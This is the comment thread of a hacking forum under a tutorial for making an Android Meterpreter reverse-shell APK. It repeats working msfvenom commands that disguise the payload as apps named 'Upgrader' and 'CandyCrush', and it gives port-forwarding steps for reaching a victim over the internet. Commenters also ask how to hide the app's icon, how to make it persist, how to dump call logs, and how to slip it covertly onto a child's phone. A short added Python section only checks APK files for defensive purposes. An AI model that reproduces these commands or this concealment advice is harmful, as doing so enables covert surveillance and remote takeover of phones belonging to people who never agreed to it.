msfvenom android/meterpreter/reversetcp LHOST=192.168.0.4 R > /root/Upgrader.apk
I tried it, got the reply 'no options' msfvenom- a metasploit standalone payload generator

use msfvenom -p android/meterpreter/reversetcp LHOST=( your internal ip if using LAN or public ip if you are using WAN ) R > /root/Upgrader.apk

It says invalid payload selected..!

Because It is: reverse_tcp

Sorry sir, may I ask why, when installing the apk on Android, I get the error "there was a problem parsing the package"?? Someone help me please...

Yeah, use a different file browser... ;);)

What do you mean by a different file browser? Explain please.

It doesn't work on Lollipop. Any leads on how to make it work on Lollipop?

Hi F.E.A.R. !

It is working well on the local network but I want to do this ''through the Internet''. I don't have a router. My network cable is directly connected to my laptop. I don't know how to port forward in this situation. Can you help me? Thanks for this lesson!

Step 1. Go to: Control Panel -> Network and Internet -> Network and Sharing Center.

Step 2. Click on: Manage Network Connections -> Right-click on Local Area Connection -> Properties.

Step 3. Click on: Sharing -> Check the "Allow other network users to connect..." and "Allow other network users to control..." boxes -> Settings -> Add a name -> Add your IP -> Then the port you want to open.

... add a port exception in your firewall too!!
Have fun ;);)

Se7enPe ACe, I am assuming you do that if you want to send it to a victim who is far away from you? One question: do I have to install it on my phone first and then send it to the victim? Let's say my kid is 15 blocks from me at school. How do I send the apk to him?

Install on my phone and send it by text? That will be too obvious.

Hmmm... This got me thinking: would it be possible to use a similar method (upload an apk to the root directory) to MANUALLY "inject" su into the root directory? Thereby at least obtaining the su binary inside the /root folder, and subsequently (somehow) gaining root access? Even if just temporary, it's a start!

Before everyone starts with the "You know how many 'one clicks' exist, right?", I have VERIZON... and I really don't want to deal with the whole Java card deal. Plus, I love hacking stuff... always enjoy the challenge - this one just has me stumped.

  • HTC One M9 on 5.0.1
  • Kernel 3.10.49
  • Build 1.33.605.15 CL511781 Release Keys

(F14.VZW.HTC6535LVW.0)

Anyone have any thoughts or a possible direction to point towards?

No, you can't, until:

  1. You use 'adb-scripts' to exploit and root the Android during boot/fastboot/download mode.
  2. During boot we have system privileges, almost like Windows.
  3. The device should not be in use during this or...

(Not tested, should work.)

I like your creative thinking, but (1) if you were to "inject" su, then it would be in the /bin directory, not the /root directory, and (2) you would need root privileges to install it and have it do what we expect it to do: give us root privileges.

I'm not sure what you are trying to do?

OTW-

My end goal is to have persistent root access to the supposed "unrootable" VERIZON HTC One M9 (nothing in this world is unhackable if you ask me).

I would need to gain "s-off" (security off) to maintain said root access, but I don't even know where to start with that; one thing at a time, I say.

And yes, thanks for correcting my mistake, it would reside in the /bin folder (since the su binary is what I'm trying to use.... I guess that's the way lol). I'm entering into uncharted territory for myself with trying to change phone permissions without having the necessary permission to actually change the permission in the first place; i.e. "fake-root" or pseudo sudo LOL (still with me there? lol), but from the looks, not very different from most *nix systems I've come across. I just want to root my phone manually; since I can't figure it out, I've come looking for help.

I've obtained "The Hacking Team's" Android Exploit Network/Framework but looking through it, it just looks like my / folder (bin, etc, opt, mnt, usr, share... etc.) that has all the exploits buried in a www folder with a server download and some php/batch? scripts.

Should I start a new thread or something? Any places to look for advice on how to do this?

Hello, I understand that this is an old topic and that I might not get a reply, but I would like to ask one anyway.

I'm working behind a corporate firewall that is basically made up of one proxy server. How would I connect back to my laptop from the phone I am trying to exploit? The only external IP I can see is the proxy server's and I cannot use the internet if I do not use it.

Also, I've noticed that on Lollipop (my phone is a rooted LG G3 D855 (International Model) running Euphoria ROM (5.0.2)), the app can easily be seen on the menu screen of my phone. Any ideas on how I could hide it?

Thanks

Ninja243

Please tell me FEAR how to port forward on a Beetel 220BXI ADSL2+ modem??

When making the Trojan file it shows up:
The utility msfpayload is deprecated!
It will be remove in or about 2015-06-08
Please use msfvenom instead
Any help?

msfvenom -p android/meterpreter/reversetcp LHOST=( your internal ip if using LAN or public ip if you are using WAN ) R > /root/Upgrader.apk

Dear OCCUPYT,
I am a newbie here. Can you please tell me where to find the IP for LHOST?

The LHOST is going to be your private IP address, which can be queried by typing 'ifconfig' into your Kali terminal.

LHOST is your IP address. Find it by typing:

ip addr

and hitting enter.

Ninja243

I have installed the Main Activity on my Android. It only works on webcam_snap. When I type help, no Android commands are found in the cmd, and because of that I cannot run the dump_calllog command. What should I do? Help....

OTW-

My reply was swept away by an odd influx of replies to the topic; I say odd because most questions had already been answered, and, more importantly, take a look at the accounts of Ninja243 and ALI ZAIN - their comments on here are their ONLY comments ever made, which begs me to ask the question, wouldn't google have been quicker than signing up and confirming an account?

I hate to assume this, but it appears I've been TROLLED! (BTW, I'm way off topic: BUT this just raises my suspicions even more re: the gov't/bigCorp paid trolls whose sole job is to derail topics that "The All Seeing Eye" deems inappropriate... I'll step down from my random mini soap-box, apologies for the rant).

I would appreciate your invaluable insight, OTW, it seems as though some others would rather it not be given... but I'm just a mad hatter so what do I know?

Sorry bro, I've only seen your comment now, but the reason that I've only commented on this post is really just because I was stumped and that I am new to Null-Byte in general. I guess you could see this as an opportunity that I took that seems to be working. Sorry if that weirded you out in any way.

Ninja243

Gametime:

First, I think you are being a bit paranoid. Paranoia in our field can be a good thing, but I think you are letting it get out of control in this matter.

Second, I have read your question again and I'm not sure what your question is other than "should I start another thread?". That might be a good idea so that I and others can understand what you are after.

OTW

@GameTime is this a 999 issue you speak of?

@CYBERHIT

I don't know what a "999" issue is. Besides my paranoid interpretation of an upside-down "666"...which is THE MARK OF THE BEAST!!! Lol. I'm paranoid, yes...delusional...not quite.

@OTW
Thanks mate, I understand that some things aren't meant for a public forum.

As far as my paranoia, I was up all night studying for another CompTIA certification (which I passed BTW, whoop whoop) so maybe I was a little bit more paranoid than usual.

This "new thread" has since been created so maybe I will have a bit more luck there...

Lastly, that's really all you got from my inquiry? Whether or not to start a new thread? I'da pegged you for a thinker! I'm only kidding. Thanks for the reply.

How big is this payload supposed to be? I've used the exact same commands as stated above (in the tutorial), but the .apk file always seems to be 0 bytes big. I tried opening it with leafpad, but it seems empty. Any ideas?

Still waiting

Ninja243

Without any encoding.. it will be about 8 KB..

Thank You for attending to the comments here, 7.

Are you actually thanking me... or is it sarcasm like the rest of 'em??

...

I have been busy lately and even will be for 2 years, and there are people who want their comments to be attended to.. While I was not present, I see you have done a great job. I wish you could continue it.

So that's why, Thank You!
Edit: Even the others (Energy Wolf, OTW...)

Oh really??
No, thanks man.. at least you appreciate me.. unlike others...

Well, I've tried multiple times to create the payload and it keeps ending up as an empty .apk file. The code I use is:

msfvenom -p android/meterpreter/reversetcp LHOST={IP} R > /root/CandyCrush.apk

What am I doing wrong?

Ninja243

Syntax error..
THIS:

msfvenom -p android/meterpreter/reversetcp LHOST=(YOUR IP) R > (ANY NAME).apk

If you still get an apk of 0 bytes then there may be a problem with your IP (LIKE IN MY CASE). I'm pretty sure you're using VMware, in which network problems are common. Make sure to edit your network connection from NAT to Bridged from the VMware settings menu and then connect to the Wi-Fi. Open cmd and enter ifconfig. If you get a new IP try that; if it's the same try with it again, maybe it'll work!

The syntax is right man...

Oh yeah sorry! I thought the underscore mattered.

Is there any error you're getting when running the command??
If not.. then maybe it's just too small and not empty... try to install it on the phone..

Alright, I've tried running it on my phone (after disabling my firewall) and nothing happens. I've looked at netstat using my phone's terminal and the .apk doesn't even seem to be running (which I found out using top).

I looked at the .apk file using FX File Explorer (which is pretty awesome by the way), and all of the 5 apk files I made were completely empty (which I find weird because something installed).

Has someone backdoored a metasploit payload?
Is that even possible, and if so, how?

Thanks, Ninja243

Edit: I am running a custom ROM on my LG G3, could that be complicating things?
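Several posters in this thread ended up with a 0-byte .apk, and one earlier got "there was a problem parsing the package" from the installer; both are symptoms of a file that is not a well-formed Android package at all. An APK is a zip archive that must at minimum carry AndroidManifest.xml, classes.dex and a signature block under META-INF/, and the installer rejects anything less. The following Python is an added triage example (not code from the post or from the Metasploit project) of the first checks a defender runs on any unknown .apk before going further: is it empty, is it a valid zip, which required entries are present, and is it signed. The sample package is constructed in memory from placeholder bytes; it is not a real app and the checks are structural only, not a signature verification.

```python
import io
import zipfile

# Entries every installable APK must contain (structural check only).
REQUIRED_ENTRIES = ("AndroidManifest.xml", "classes.dex")
# Signature block file types placed under META-INF/ by the v1 (JAR) scheme.
SIGNATURE_SUFFIXES = (".RSA", ".DSA", ".EC")


def build_sample_apk(include_dex: bool = True, signed: bool = True) -> bytes:
    """Constructed stand-in for an APK: a zip with the expected entry names
    but placeholder contents (no real manifest, dex or certificate)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"<constructed-placeholder-manifest/>")
        if include_dex:
            zf.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 64)
        zf.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n")
        if signed:
            zf.writestr("META-INF/CERT.RSA", b"placeholder-signature-block")
    return buf.getvalue()


def triage_apk(data: bytes) -> dict:
    """Structural triage of APK bytes. Returns a report dict whose 'verdict'
    names the first problem found, or says the structure is complete."""
    report = {"size": len(data), "valid_zip": False, "entries": [],
              "missing": list(REQUIRED_ENTRIES), "signed": False, "verdict": ""}
    if not data:
        # The 0-byte case from the thread: the generator wrote nothing.
        report["verdict"] = "empty file: nothing was written"
        return report
    if not zipfile.is_zipfile(io.BytesIO(data)):
        # What Android's "problem parsing the package" usually means.
        report["verdict"] = "not a zip archive: the installer will report a parse error"
        return report
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if zf.testzip() is not None:
            report["verdict"] = "zip archive with a corrupt member"
            return report
        names = zf.namelist()
    report["valid_zip"] = True
    report["entries"] = names
    report["missing"] = [e for e in REQUIRED_ENTRIES if e not in names]
    report["signed"] = any(n.startswith("META-INF/") and n.endswith(SIGNATURE_SUFFIXES)
                           for n in names)
    if report["missing"]:
        report["verdict"] = "zip but not an installable APK: missing " + ", ".join(report["missing"])
    elif not report["signed"]:
        report["verdict"] = "APK structure present but no signature block: Android refuses unsigned packages"
    else:
        report["verdict"] = "structurally complete APK; inspect the manifest permissions next"
    return report


if __name__ == "__main__":
    for label, blob in (("empty", b""),
                        ("garbage", b"this is not an apk"),
                        ("no dex", build_sample_apk(include_dex=False)),
                        ("unsigned", build_sample_apk(signed=False)),
                        ("complete", build_sample_apk())):
        print(f"{label:9} {triage_apk(blob)['verdict']}")
```

On a real file, pass the result of open(path, "rb").read() to triage_apk; a "structurally complete" verdict only says the package can be installed, which is exactly when the next questions (who signed it, what permissions it asks for, where it connects) matter.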

Just give me/us the lhost, I'll create it for you for testing purpose.
(If you trust me of course, which I won't recommend)

Haha, thanks for the offer, but I cannot do that. Not only because of the obvious security implications, but also because of how the corporate firewall that I am using is set up.

Thanks for the help

Ninja243

Maybe you didn't make the payload correctly.. it has to be about 8 KB... make sure you type everything correctly..
Also, just start multi handler and check if it's working rather than checking netstat..

I have also tried that msfvenom script, but that script is about 0 KB while msfpayload's is 8 KB. Is there an error or what?

Hey, I just wanted to know how I can keep the app icon hidden after installing. And also how can I make the app auto start after a time period so that I don't have to wait for the victim to open the app?

BTW, very nice article.

Hello,
You mean persistence?
Here...
(The script is unstable in Lollipop)

A single problem: when I try to install it on the phone it always says "App not installed" while installing. Install from foreign sources is enabled. Any ideas?